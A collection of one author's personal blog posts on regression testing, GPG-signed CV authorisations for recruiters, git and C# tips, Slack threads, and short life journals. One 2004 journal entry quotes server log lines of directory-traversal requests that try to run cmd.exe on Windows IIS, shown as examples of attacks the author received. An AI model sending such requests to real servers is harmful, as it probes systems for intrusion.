layout: post
title: Regression Tests for ASP.NET / SQL Projects
date: 2018-03-13 15:25:46.000000000 +00:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
meta:
_wpcom_is_markdown: '1'
_rest_api_published: '1'
_rest_api_client_id: "-1"
_publicize_job_id: '15685724070'
timeline_notification: '1520954747'
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2018/03/13/regression-tests-for-asp-net-sql-projects/"
---
I've had the opportunity to attempt many variations of regression testing on many projects.
Many of the systems I've worked on have at least some level of workflow, meaning a user has to move through many steps as the system progresses something towards a final state.
As systems become more and more complex it becomes harder to not accidentally break an area of the system you weren't currently looking at and didn't re-test manually before shipping. Hence the search for the holy grail of the perfect regression test suite. It turns out that none of the approaches available (unit tests, UI drivers etc.) provide a single solution to the problem, and instead we have to use all these approaches in balance to give reasonable protection against regressions.
Here I lay out my current thinking on the best way to use testing to avoid regressions in a standard ASP.NET MVC + SQL Server project. I would like to introduce to you the idea of "business logic tests" which are an integration test suite starting below the UI layer, continuing through to a real database. I believe this gives an ideal balance of the trade-offs we have to make when choosing how to design our full regression test suite for a system.
## System layers
The layers of such a system are ideally something like this:
* Database (largely just used for CRUD storage)
* ORM - EF or similar library
* Model - C# classes
* Business logic layer - pure C# - (often missing in real projects, with business logic scattered across the other layers)
* UI layer - Controller classes written in C#, views in razor .cshtml files, html, css, javascript etc.
## Recommended test layers
* **Unit tests** - test small pieces of C# code
* **Business logic tests** - test the business logic layer down through to a real SQL Server database.
* **UI Smoke tests** - non-exhaustive test of a few common user journeys through the system, running against a real database, driven with Selenium Web Driver or similar.
There should be only a few smoke tests, there should be many business logic tests covering all business functions that need to stay working, and finally developer discretion on the amount of unit testing to apply at the lowest level.
## What do the business logic tests look like?
These could be pure code driven through something like NUnit, or they could be in business language through a BDD tool like specflow.
They depend on the business logic project but nothing above that (UI). They inject a real database connection as a dependency through whatever injection method you use.
These tests should make sense to the product owner / client.
This is the layer with the broadest coverage of all of the three styles in play. Every business use-case, workflow & variation should be covered here. This is the suite that will alert you if any business or workflow rule is no longer being applied as designed, or if an obscure step of an obscure branch of your workflow has stopped working (perhaps due to an odd interaction with a database constraint).
## Handling the database
SQL Server has a very useful snapshot feature that means you can very rapidly roll back to a clean state after each test run. ([Snapshot setup script](https://gist.github.com/timabell/3164291#file-create-snapshot-sql))
For each business logic test run:
1. [Reset to the production snapshot](https://gist.github.com/timabell/3164291#file-reset-to-snapshot-sql) (or production equivalent build if you can't actually grab a production backup)
2. Run outstanding migrations for this version of the code (you are using [Octopus + ReadyRoll](https://documentation.red-gate.com/rr1/deployment/octopus-deploy) aren't you?)
3. Run the Business logic tests.
## Why not test all the business functions through the UI?
* UI tests are prone to reliability problems, you can end up with 98% pass rates being normal, so then you don't notice when a critical test fails.
* UI tests are slow - this can add an extra overhead to developer productivity.
* UI tests cause unwarranted resistance to change - once you have UI tests the UI becomes extremely hard to change, particularly for sweeping site-wide redesigns without spending a prohibitively long time fixing up the test suite. And you aren't fixing the test suite because you changed the logic, this is busywork.
* The UI isn't sufficiently fragile to warrant this level of testing - when you are working on a page you are unlikely to break unrelated pages without realising.
I have seen first-hand a team of excellent programmers get bogged down in problems with a full regression test suite driven entirely from the UI.
## Why not test all layers separately?
In my experience a major point of fragility when a system is modified is the interaction between the code and the database. As such it's important that this fault-line is covered thoroughly by all regression tests that focus on business functions that need to remain functional.
A test suite that isolates the business logic layer from the database layer provides very little value, usually just fulfilling a "_thou shalt unit test all classes_" declaration.
## How to get there
If you don't have a solid business logic layer then you will need to refactor your way to that goal. This has other benefits for reliability beyond the ability to test. Clean code with an obvious layer for all the business logic is easier to modify and keep defect-free.
## Bonus - free test data
The tests that you write to drive the business logic layer will be generating real data in a real copy of your database as it runs through the many steps in a workflow. You can use this test driver to generate useful test data for every step in a workflow, e.g. if a workflow had four steps you could do the following:
1. Test account A - drive business logic to step 1
2. Test account B - drive business logic to step 2
3. Test account C - drive business logic to step 3
4. Test account D - drive business logic to step 4
This is extremely quick to run, and now you have an account in every state of your workflow. This is useful for easily:
* Demoing your system from any starting point with multiple test accounts.
* Having the data in the right state to do development work on state 4 without having to manually set it up.
* Give your manual testers all the test accounts they need in many interesting states.
* Testing out your reporting systems and anything else that consumes data from your database.
Having realised you can do this, why would you ever do it manually again?
Because the code that generates this data is a core part of your regression test suite it will be maintained as part of normal development activities and so you'll never again have to deal with test data that no longer works with your latest version of the system.
* * *
If you want me to help you get to this ideal then drop me a line - [<EMAIL>](mailto:<EMAIL>)
<file_sep>---
title: "This is a local village"
date: 2004-06-14
slashdot_url: https://slashdot.org/journal/74396/this-is-a-local-village
---
<p>Heard today that my x is now engaged to fb. Had it rubbed in my face as usual.</p>
<p>Oh well.</p>
<p>Good luck to them. I guess.</p>
<file_sep>---
title: "Urgh. Not such a toothy grin now."
date: 2004-11-12
slashdot_url: https://slashdot.org/journal/90179/urgh-not-such-a-toothy-grin-now
---
<p>Had two bottom wisdom teeth extracted on Tuesday and am still recovering. Don't think I'll post a pic, wouldn't want to scare the children! Thanks to my friends in reading for looking after me while I was woozy! Back to my soup now.</p>
<p>I've just booked tickets for this <a href="http://www.delicatessen-reading.org.uk/"><NAME></a>. Let me know if your gonna come too (£10).</p>
<p>xx</p>
<file_sep>---
layout: post
title: Sql Data Viewer - preview release
date: '2015-10-27T14:45:00.000Z'
author: <NAME>
tags:
modified_time: '2015-10-27T14:45:10.514Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-1811864781113378864
blogger_orig_url: https://timwise.blogspot.com/2015/10/sql-data-viewer-preview-release.html
---
Hello dear readers,
I've started working on a data browser for relational databases that allows you to click through ids with foreign-keys to get around.
Take a look at [http://www.timwise.co.uk/sdv/](http://www.timwise.co.uk/sdv/) and if you think you might be interested then please do sign up to my [mailing list](http://eepurl.com/bDGPjf), and let me know if you have any feedback.
This started as a holiday exercise in learning google's go programming language, but is intended to become a fully-fledged software product available to buy.
Tim
<file_sep>---
layout: post
title: configuring kdiff3 as a mergetool in msysgit
date: '2010-09-03T08:31:00.004Z'
author: <NAME>
tags:
- windows
- git
- kdiff3
modified_time: '2011-01-14T11:56:40.103Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-362080553431078830
blogger_orig_url: https://timwise.blogspot.com/2010/09/configuring-kdiff3-as-mergetool-in.html
---
How to configure kdiff3 as a mergetool in msysgit. (I think if you install kdiff3 *before* msysgit it is picked up automatically, if not, do the following after installing both).
In git bash:
    git config --global merge.tool kdiff3
    git config --global mergetool.kdiff3.path "c:\Program Files\KDiff3\kdiff3.exe"
double check:
    cat ~/.gitconfig
    [merge]
        tool = kdiff3
    [mergetool "kdiff3"]
        path = c:\\Program Files\\KDiff3\\kdiff3.exe
refs:
* [http://markmail.org/message/dvrnn7ilprvinrfp#query:msysgit%20kdiff3%20.gitconfig+page:1+mid:dvrnn7ilprvinrfp+state:results](http://markmail.org/message/dvrnn7ilprvinrfp#query:msysgit%20kdiff3%20.gitconfig+page:1+mid:dvrnn7ilprvinrfp+state:results)
* [http://www.kernel.org/pub/software/scm/git/docs/git-config.html](http://www.kernel.org/pub/software/scm/git/docs/git-config.html)
Under cygwin, the setup would be:
    git config --global merge.tool kdiff3
    git config --global mergetool.kdiff3.path /cygdrive/c/Program\ Files\ \(x86\)/KDiff3/kdiff3.exe
Giving the config file contents:
    [merge]
        tool = kdiff3
    [mergetool "kdiff3"]
        path = /cygdrive/c/Program Files (x86)/KDiff3/kdiff3.exe
Which by the way you can view with
git config -e --global
<file_sep>---
layout: page
title: Recruiters
permalink: /recruiters/
redirect_from: /2015/10/28/dealing-with-dodgy-recruiter-tactics/
---
While many recruiters try and be reasonable, there are enough out there using
[underhand
tactics](http://www.brandonsavage.net/why-recruiters-are-bad-for-your-career/)
to make life difficult and potentially jeopardise a good contract.
The tactics addressed below are:
1. "Multiple submission". This is where you end up with your CV landing on a client's desk from **two** different recruitment companies. I gather this can be the nail in the coffin of a contract even if the client was keen - who wants to be stuck in the middle of two recruiters fighting over the commission?!
2. Requiring "references" that are actually just lead generation.
# Multiple submission
## Principles
The first step is simple, which is **never agree verbally or otherwise to be
put forward without first finding out who the client is**, and make sure you
keep track of who sent your CV where. I find
[Trello](https://trello.com/timabell2/recommend) is a good tool for keeping on
top of the fast moving and often fragmented information you get when hunting
for contracts, particularly combining web view with the mobile apps for on-the
go access to the information.
Recruiters are often hesitant to pass on the client's name, and this is
understandable as if you were to go round them then they'd lose their
commission which is how they earn a living. Worse, if you let the name slip to
another less scrupulous recruiter then they may try and get your CV in first
themselves without asking and in doing so sour the deal for everyone. (They
often fish for names with phrases like "*I need to know who else you've been
submitted to in order to avoid duplication*" - this is a lie, you can manage
this fine yourself.)
To tackle this I recommend the following:
* Never share their client's name with anyone else, especially other
recruiters; make it clear this is a point of principle.
* Prove your integrity by politely refusing to tell recruiters who ask, they
might have liked the name, but they will be more likely to trust you in the
future for respecting the wishes of other recruiters.
So that's the easy bit which I've been doing for some time...
<div style="text-align: center">
<a href="https://www.flickr.com/photos/tim_abell/21013910269/" target="_blank" rel="noopener"><img title="" src="https://c2.staticflickr.com/6/5769/21013910269_433c52303f.jpg" alt="Picture of an otter's head poking up in the sea." width="320" height="192" border="0" /></a>
</div>
## Technical measures
There are unfortunately a bunch of particularly unscrupulous recruiters out
there like sharks in the water who will without your permission, or possibly
without ever contacting you, send your CV to their "client" (or just some poor
manager they've found to spam with CVs). You can't tell them not to if they've
never asked you, and it can still ruin a deal. So what to do about that?
If you're looking for contract work, you really need good exposure, so having
your CV all over the place like leaves in the wind is not a bad way of getting
the word out there (bear in mind I'm looking for work for my contracting
company, which is a different ball-game to finding that perfect permanent
role). It's actually pretty hard to control at all if you're dealing with
recruiters because as soon as you include your CV in a response to posting on
[JobServe](http://www.jobserve.com/) it'll be dropped straight into that
recruiter's pool of CVs, and some recruiters even pool CVs between them using
services like [iProfileUK](http://www.iprofileuk.com/).
To prevent that free-wheeling CV being used without permission, it contains the
following text (as does [my LinkedIn
profile](https://www.linkedin.com/in/timabell)):
> Recruiters: this CV is not authorised for distribution to your clients.
> Please contact me for permission to represent me and for a separate copy
> containing an authorisation code & gpg signature. Thanks. To prospective
> clients, if you receive my CV without these then I haven't given permission
> to be represented.
Okay, so far so good, but any unscrupulous recruiter could just strip that out
and send it anyway, and how would I be able to make a client comfortable that
they can tell this scumbag to jog on?
So before I agree to be represented by a particular recruiter to a particular
client (which I have no particular objection to if they've found work I
otherwise couldn't have found), I will be needing the client's name. I will add
this to a list of who has authorization to send my CV and who they are
authorized to send it to. I will then generate a customised CV (via mail merge)
with explicit permission to represent me to this specific client included in
it, and a note that any CVs received without this are unauthorized by me.
To prevent a recruiter cottoning on and just generating this themselves I will
then be [GPG](https://gnupg.org/) signing the result, which can then be checked
against my public key, proving that it did indeed come from me (assuming my pc
hasn't been hacked of course but I haven't heard of any recruiters going that
far, if they could they'd probably be security consultants instead of
recruiters!).
## Technical details
### Auth codes
These in a way are redundant, but they are easier for the average person to check, and they add an air of authority to the whole thing to help discourage those who would behave in bad faith.
Using libreoffice calc, codes are generated with the following:
A cell containing allowable characters in the codes as text: `0123ABCDEF` etc
for this example this is in cell `F1`.
A row for each authorized representation containing this formula to generate a
unique authorisation code: `=CONCATENATE(MID($F$1,RANDBETWEEN(1,LEN($F$1)),1)`,
[repeat the "mid" clause once for each digit of the code to be generated] )
### Generating auth text
There's another concatenation cell to generate the message to add to the CV.
This auth text is then copy-pasted into a file, and signed with gnupg on the command-line of my Linux box.
### Signing
Here you can see the signing happening, followed by verification that the file is signed properly (as the client might do if they suspect a recruiter is reusing my CV without my permission).
```bash
gpg --clearsign authorization.txt
```
the contents of the signed file (output to `authorization.txt.asc`) is then copy-pasted onto the end of a CV and
sent off to the recruiter to relay to their client. Along with a custom header with the client & recruiter name to make it absolutely clear who it's solely intended for.
### Verifying
```bash
gpg --verify authorization.txt.asc
gpg: Signature made Fri 07 Apr 2023 10:31:36 BST
gpg: using RSA key 74D42A4C905507C54A7E3C9C26C6E08728CDF8EA
gpg: Good signature from "<NAME> <<EMAIL>>" [ultimate]
```
The important bit here is "Good signature".
If you haven't told gpg to trust my key then you'll get a stern warning from gpg, but it still checks the signature. GPG (and PGP) do more than just sign files, they have a web-of-trust system that involves showing up in the real world with passports and signing each other's keys. You can see why that hasn't gone mainstream, but it is very good.
See <https://yanhan.github.io/posts/2014-03-04-gpg-how-to-trust-imported-key/> for how to mark keys as trusted.
#### My public key
My current public key `28CD F8EA` for `<EMAIL>`.
You can obtain the key for verifying from:
* My website: [public-key.txt](/public-key.txt)
* [keyserver.ubuntu.com](http://keyserver.ubuntu.com/pks/lookup?search=tim%40timwise.co.uk&fingerprint=on&op=index) (synchronised with other key servers)
* [keys.openpgp.org](https://keys.openpgp.org/search?q=<EMAIL>)
Full primary key fingerprint: `74D4 2A4C 9055 07C5 4A7E 3C9C 26C6 E087 28CD F8EA`.
Learn more about the state of sharing gpg keys: <https://superuser.com/questions/227991/where-to-upload-pgp-public-key-are-keyservers-still-surviving>
### Examples
I've uploaded a couple of files for you to try out verifying, one with the
original message, and one with a forged message where the client's name has
been changed. See if you can figure out which is which:
* [authorization1](/assets/authorization-1.txt.asc)
* [authorization2](/assets/authorization-2.txt.asc)
### Limiting the period of right to represent
It occurred to me more recently that there should be a time limit of say 3 months on the permission for a recruiter to represent you. As such my permission message currently reads:
> "<NAME> has given permission for ExampleRecruiter to pass on this CV to ExampleClient on 22 Jan 2022; auth code Q5GAYUEEH5. Any copies of my CV received without a valid gpg signature have not been authorized for distribution. Any express or implied right to represent will expire on 22 Apr 2022 Learn more: https://timwise.co.uk/recruiters "
# Requests for "References"
Unfortunately the more unscrupulous recruiters will claim they need "references" pretty much on first contact before even making contact with the client for you. References should be a follow-up cross check once fit is agreed on. In the worst case these are no such thing, and are actually just mining you for contact details of potential new business that they can harass to find openings and contacts for their database. Worst case they will then spam that contact with unsolicited CVs in the hope of gaining an unearned commission. You owe it to your closest contacts (those who would do you the favour of writing a reference) to protect them from such approaches from the wild-west of the recruitment industry. They doubtless get enough of this cold outreach without you allowing more of it. Worse they might even use your name without permission to try and gain credence with your contact.
Defenses:
1. Don't ever give out "reference" details until you know for certain that the end client has specifically requested them.
2. Provide them only to the end client, not the recruitment firm.
3. Provide them explicitly for the specific purpose of reference checking, and forbid their use for any other purpose. Cite breach of GDPR.
It's also important that you check with your contact that they are happy to be a reference for you and that they will be expecting contact from whichever recruiter or client you are in talks with. This way if your name or contact is spammed or abused by this firm then you will both know it has happened.
Do not allow yourself to be pressured into providing references inappropriately, early or carelessly on pain of losing a deal. With the shadiest of recruitment companies the deal may not even exist and may just be made up for the purpose of attracting CVs and filling in their database of prospects to spam.
<file_sep>---
title: "unblocked!"
date: 2005-05-13
slashdot_url: https://slashdot.org/journal/106732/unblocked
---
<p>finally, I can post messages from home,<nobr> </nobr>/. have finally removed the block on nthell's proxy.</p>
<p>more posts will now follow.</p>
<p>In the mean time, have you seen my bookmarks?<br><a href="http://www.timwise.co.uk/">timwise.co.uk</a> > bookmarks.</p>
<p>swimming? nope, haven't been for ages, will do soon. played badminton the other week though.</p>
<p>Don't forget to come and meet Sophie if you haven't already.<nobr> </nobr>:D</p>
<p>cheers tom 'n kev for keepin up the flow.</p>
<p>x</p>
<file_sep>---
layout: page
title: Subscribe
permalink: /subscribe/
---
<!-- subscribe box and content is in footer -->
Subscribe by email below for full mailing list.
Blog posts are also available as an <a href="/feed.xml">RSS/Atom feed</a> if you prefer to use a feed reader (though some things I only post to the mailing list).
<file_sep>---
title: "life continues"
date: 2004-09-10
slashdot_url: https://slashdot.org/journal/83324/life-continues
---
<p>Worked many hours this week, trying to get new work web site finished.</p>
<p>So this evening I cycled to the pool and did an hours training. I'm now tired and chlorinated, but very relaxed.<br>---<br>My web server went off on one at 2am the other night (just when I was thinking of going to sleep), thrashing its hdd. Think someone was trying to hack into it with a buffer overflow. Here's the log:</p>
<blockquote>
<div><p> <tt>192.168.3.11 - - [09/Sep/2004:02:22:01 +0100] "POST http://192.168.3.11:25/ HTTP/1.1" 200 480 "-" "-"</tt></p></div> </blockquote>
<p>Sods.</p>
<p>Looking at my logs, the server was subject to a few attempts within hours of it coming online.<br>Much more than my hosted site. Guess it's people running <a href="http://www.insecure.org/">nmap</a> against adsl dial up ip ranges and getting all excited by the prospect of an open port 80.</p>
<p>Here's a classic example:</p>
<blockquote>
<div><p> <tt>192.168.127.12 - - [05/Sep/2004:17:37:46 +0100] "GET<nobr> </nobr>/.hash=eb649e3d22cdb034d91b64d4c11215f83a7e2fda HTTP/1.1" 404 372 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:26 +0100] "GET<nobr> </nobr>/scripts/root.exe?/c+dir HTTP/1.0" 404 342 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:28 +0100] "GET<nobr> </nobr>/MSADC/root.exe?/c+dir HTTP/1.0" 404 340 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:28 +0100] "GET<nobr> </nobr>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:28 +0100] "GET<nobr> </nobr>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:28 +0100] "GET<nobr> </nobr>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 364 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:28 +0100] "GET<nobr> </nobr>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 381 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:28 +0100] "GET<nobr> </nobr>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 381 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:28 +0100] "GET<nobr> </nobr>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 397 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:29 +0100] "GET<nobr> </nobr>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 363 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:29 +0100] "GET<nobr> </nobr>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 363 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:29 +0100] "GET<nobr> </nobr>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 363 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:29 +0100] "GET<nobr> </nobr>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 363 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:29 +0100] "GET<nobr> </nobr>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 354 "-" 
"-"<br>172.16.58.3 - - [06/Sep/2004:18:08:29 +0100] "GET<nobr> </nobr>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 354 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:29 +0100] "GET<nobr> </nobr>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 364 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:29 +0100] "GET<nobr> </nobr>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 364 "-" "-"<br>192.168.127.12 - - [07/Sep/2004:12:59:20 +0100] "GET<nobr> </nobr>/.hash=cf770b6f55e15660d70f00542bd58efeb7a8487f HTTP/1.1" 404 372 "-" "-"</tt></p></div> </blockquote>
<p>--<br>By the way, if you think nmap is very uncool to know about, may I direct you to the news article on nmap's site which shows Trinity actually doing a real hacking attack in the film Matrix Reloaded<br><a href="http://www.insecure.org/">http://www.insecure.org/</a></p>
<file_sep>---
title: "sleep is for wusses"
date: 2004-05-02
slashdot_url: https://slashdot.org/journal/70152/sleep-is-for-wusses
---
<p>My debut performance draws near! I have my picture in the twyford advertiser and the henley standard which is cool. I stood outside Waitrose for an hour publicising the play and got slightly nervous as to the number of people who actually sounded interested. So I made an extra effort in the technical rehearsal and only got some of it completely wrong. Oh well, guess it's called amateur dramatics for a reason!</p>
<p>As for the swimming, I'm pleased with the improvement in my technique, soon I may even be able to swim the required distances in one go. I've also been doing a bit of running. The new shoes still aren't quite right - they rub a bit, and it's going to be a long time before I can run ten kilometers. Maybe I'll wait till next year before attempting to race, I wouldn't want all the marshals to have to wait for me before they can go home!</p>
<p>And now, a word about coz.<br>The other day I was sitting with my friends in her old house, and it was quiet, so I said "everyone point at coz", and everyone pointed at the floor, and laughed. Then we discussed whether coz would have gone coy even when so far away<nobr> </nobr>:D</p>
<p>Now I'm going to have another go at re-encoding DV video into XviD. Then it's time for some sleep.</p>
<file_sep>---
title: "warble"
date: 2003-11-14
slashdot_url: https://slashdot.org/journal/52210/warble
---
<p>yada yada</p>
<p>nothing doing today.</p>
<p>Hello James, if you see this hope the weather's nice in whichever part of the world you're in today!</p>
<p>Suppose I might as well post that my domain is timwise.co.uk, and that it currently contains a cub web site! (Which I'm v proud of. - tho you can't see most of the interesting bits because that's the admin pages.)</p>
<p>Just wondering whether to upload the code to freshmeat or summat, and if I should start using GPL 'n things.</p>
<p>Ooh, and I bought some two-way radios<nobr> </nobr>:)<br>Binatone 0503, 30 quid the pair from B&Q<br>(Yes I did really need them)</p>
<p>And a cordless drill (oops!)</p>
<file_sep>---
title: "SBR"
date: 2004-06-23
slashdot_url: https://slashdot.org/journal/75235/sbr
---
<p>SBR = Swim, Bike, Run. It's a triathlon thing.</p>
<p>On monday, I biked to work as per, very unstrenuous. Then I went training in the evening. Went for a proper training run, which I was just jogging back from when the heavens opened and I got soaked. The water then turned to slush, like being sprayed with a slush puppy.</p>
<p>Then I swam, very very slowwwly (urgh, gurgle).</p>
<p>Spent tuesday moaning about how much my legs hurt and how tired I was. It's good to be a brit.</p>
<p>Today I woke up with a start thinking I'd slept through my alarm. But it was half an hour too early. Must've got enough sleep for once.</p>
<p>xx</p>
<p>Tim</p>
<file_sep>---
layout: post
title: throw vs throw ex vs wrap and throw in c-sharp
date: '2014-05-10T10:23:00.000Z'
author: <NAME>
tags:
modified_time: '2014-05-10T10:37:34.821Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2291640492202610062
blogger_orig_url: https://timwise.blogspot.com/2014/05/throw-vs-throw-ex-vs-wrap-and-throw-in.html
---
I've come across the `throw` vs `throw ex` 'debate' a few times, even as an
interview question, and it's always bugged me because it's never something I've
worried about in my own c# code.
# Background
So here's a typical example of the throw vs throw ex thing:
[https://stackoverflow.com/questions/730250/is-there-a-difference-between-throw-and-throw-ex](https://stackoverflow.com/questions/730250/is-there-a-difference-between-throw-and-throw-ex)
Basically it revolves around either messing up the line numbers in your stack
trace (`throw ex;`) or losing a chunk of your stack entirely (`throw;`) -
exception1 and 2 respectively in this nice clear answer:
[http://stackoverflow.com/a/776756/10245](http://stackoverflow.com/a/776756/10245)
<div class="flickr-pic">
<a data-flickr-embed="true"
href="https://www.flickr.com/photos/tim_abell/13910043519/"><img
src="https://live.staticflickr.com/7193/13910043519_348f641fe1_k.jpg"
alt="Smiley face in a coffee stain"></a>
</div>
# The third option
I've just figured out why it's never been an issue for me.
Because in my own code, whenever I catch and re-throw I _always_ wrap another
exception to add more context before rethrowing, and this means you don't have
either of the above problems. For example:
```
private static void ThrowException3() {
try {
DivByZero(); // line 43
} catch (Exception ex) {
throw new Exception("doh", ex); // line 45
}
}
```
Exception 3:
```
System.Exception: doh ---> System.DivideByZeroException: Division by zero
at puke.DivByZero () [0x00002] in /home/tim/repo/puker/puke.cs:51
at puke.ThrowException3 () [0x00000] in /home/tim/repo/puker/puke.cs:43
--- End of inner exception stack trace ---
at puke.ThrowException3 () [0x0000b] in /home/tim/repo/puker/puke.cs:45
at puke.Main (System.String[] args) [0x00040] in /home/tim/repo/puker/puke.cs:18
```
Obviously 'doh' would be something meaningful about the state of that function
`ThrowException3()` in the real world.
Full example with output at
[https://gist.github.com/timabell/78610f588961bd0a0b95](https://gist.github.com/timabell/78610f588961bd0a0b95)
This makes life much easier when tracking down bugs / state problems later on.
Particularly if you `string.Format()` the new message and add some useful state
info.
<file_sep>---
title: "xmas flash animation"
date: 2004-11-15
slashdot_url: https://slashdot.org/journal/90420/xmas-flash-animation
---
<p>just call me dave. [grin]<br><a href="http://homepage.ntlworld.com/david.davies527/sheep/sheepanims/cardxmas2003.htm">http://homepage.ntlworld.com/david.davies527/sheep/sheepanims/cardxmas2003.htm</a><br>i like it. go look at his other stuff.</p>
<p>Today I went to work, which was novel, having been laid up after the tooth extraction thingy. I was starting to forget what I went for. It's definitely more interesting than being at home watching the spiders decorate my house in preparation for christmas. Not that I was, but the comparison is still valid.</p>
<file_sep>---
title: Why I want you to use slack threads
layout: post
---
Someone has probably sent you a link to this blog post in response to you posting multiple messages in a slack channel on the same topic.
Don't worry, we're not angry with you, we just want to help. We also know that the slack interface can be a bit confusing, especially on mobile, and it's easy to accidentally respond in channel instead of in a thread.
This post is not intended to shame or berate you, just to share information on how we can all make slack a nicer and less distracting thing to use for everyone.

The above screenshot is an example of two consecutive messages in slack, this happens if you send the message in two parts. (Send one message, think of something extra, send another message.)
This post is here to explain to you with kindness why posting multiple messages like this might be causing issues for other people and offer some alternate approaches.
## Why multiple messages are a problem for others
It seems harmless to just post another couple of messages, right?
Slack in any active organisation can quickly become a firehose of information that can be quite hard to keep up with. It takes some effort from all involved to protect everyone's focus and flow time. As an aside if you want an insight into just how damaging distractions can be I recommend diving into Cal Newport's writings <https://www.calnewport.com/books/>, particularly "Deep Work". Some of us have the luxury of turning off slack for most of the day, but some people need to keep up more actively than that.
### Notifications and unread messages
Slack allows you to carefully manage what notifications you receive, but for a channel it basically comes down to notifications on or off for channel messages.
If you have a channel that you want (or need) to keep up to date with in a timely manner then when someone sends a new channel message you will have intrusive notifications and as shown below an "unread channel" in bold-and-white sat glaring at you waiting to be read:

If you use the convenient "All unread" feature then that will also sit glaring at you as below with an eye-catching "1 new message" button until you go and look:

The problem with multiple related channel messages in this case is that if someone gets your first message, decides that it's not a conversation relevant to them and then goes back to trying to concentrate your second message will set off all their notifications once again and send them back to having unread messages to worry about.
If you had instead used the below alternatives of editing or threads then there would be no new notifications and no new unread messages when you edit your message or add to the thread.
### Deciding what conversations to follow
As someone who is trying to avoid slack-overwhelm the ability to follow and unfollow threads is a very useful feature. Slack will automatically give new notifications for threads where you have been mentioned with an `@` or have added a message of your own to the thread.
To follow/unfollow a thread, hover over the top message in the thread, click the dots, and click "turn off notifications for replies" as shown below:

If people are not correctly using threads to group themes of discussion then this feature becomes mostly useless.
As an aside this applies just as much to failure to start a new thread when the discussion changes topic as it does to failing to use threads in the first place.
### Catching up with a channel
Sometimes you will join a channel and then mute it (right-click, mute) because you want to be able to keep up to date on your own schedule, say daily or weekly.

When people in the channel have conversations in the form of channel messages you can easily end up having to read 1000 messages to just know what's been going on for a day and catch up on anything important.

If instead the people in the channel are disciplined in using threads then it can easily be down to 20 messages with some very long threads that you can dive into if you feel the need.
## What you can do instead
By using the following methods you can help everyone else in your slack channel make better use of their time, more easily follow relevant conversations, and have fewer distracting FOMO moments (Fear Of Missing Out).
### Start a thread
Start a thread on your own message and add more messages in there:

This allows you to add further context etc for those interested without writing a massive message in one go directly in the channel or creating a string of independent channel messages.

See also <https://slack.com/intl/en-gb/help/articles/115000769927-Use-threads-to-organise-discussions->
### Edit your existing message
Did you just forget to mention something? You can edit the message you've already posted to make corrections or add more information.
Hover over the message and then press the "more actions" dots:


See also <https://slack.com/intl/en-gb/help/articles/202395258-Edit-or-delete-messages>
### Delete your subsequent messages
If you've already posted more than one channel message and then realise your mistake, you can delete the extra messages before converting to a thread or edit, leaving the channel nice and tidy for anyone who shows up later to read.

This is particularly important to avoid ending up with multiple threads on different channel messages (on the same topic) as other people reply to different bits of your message resulting in confusion and a disjointed conversation.

See also <https://slack.com/intl/en-gb/help/articles/202395258-Edit-or-delete-messages>
## Offering gentle reminders with an emoji
If your team knows to do this but forgets sometimes then add `:start_a_thread:` as an emoji (under "customize workspace") to easily remind people when they forget.

(Thread gif image source: <https://slackmojis.com/>)

## Summary
So in summary, please give a thought to others before you send a second message. It may be quick for you but if there are 50 people in the slack room then you are costing them much more time and attention than it saves you by not taking the time to construct a clean message or thread.
<file_sep>---
title: "Music - bad response"
date: 2003-12-28
slashdot_url: https://slashdot.org/journal/56467/music---bad-response
---
<p>There's a reason fruityloops shouldn't have a free demo... and it sounds like <a href="http://www.t.abell.dsl.pipex.com/music/unlit-ted1.mp3">this</a> (consider this copylefted).</p>
<file_sep>---
layout: post
title: backing up Vista
date: '2009-12-18T10:08:00.002Z'
author: <NAME>
tags:
modified_time: '2009-12-18T11:57:06.028Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-7478677393110232279
blogger_orig_url: https://timwise.blogspot.com/2009/12/backing-up-vista.html
---
So here's a tale of annoying things.
I generally try and avoid running anything proprietary at home, and especially anything from Microsoft. But for reasons beyond my control a copy of Vista has embedded itself in our household.
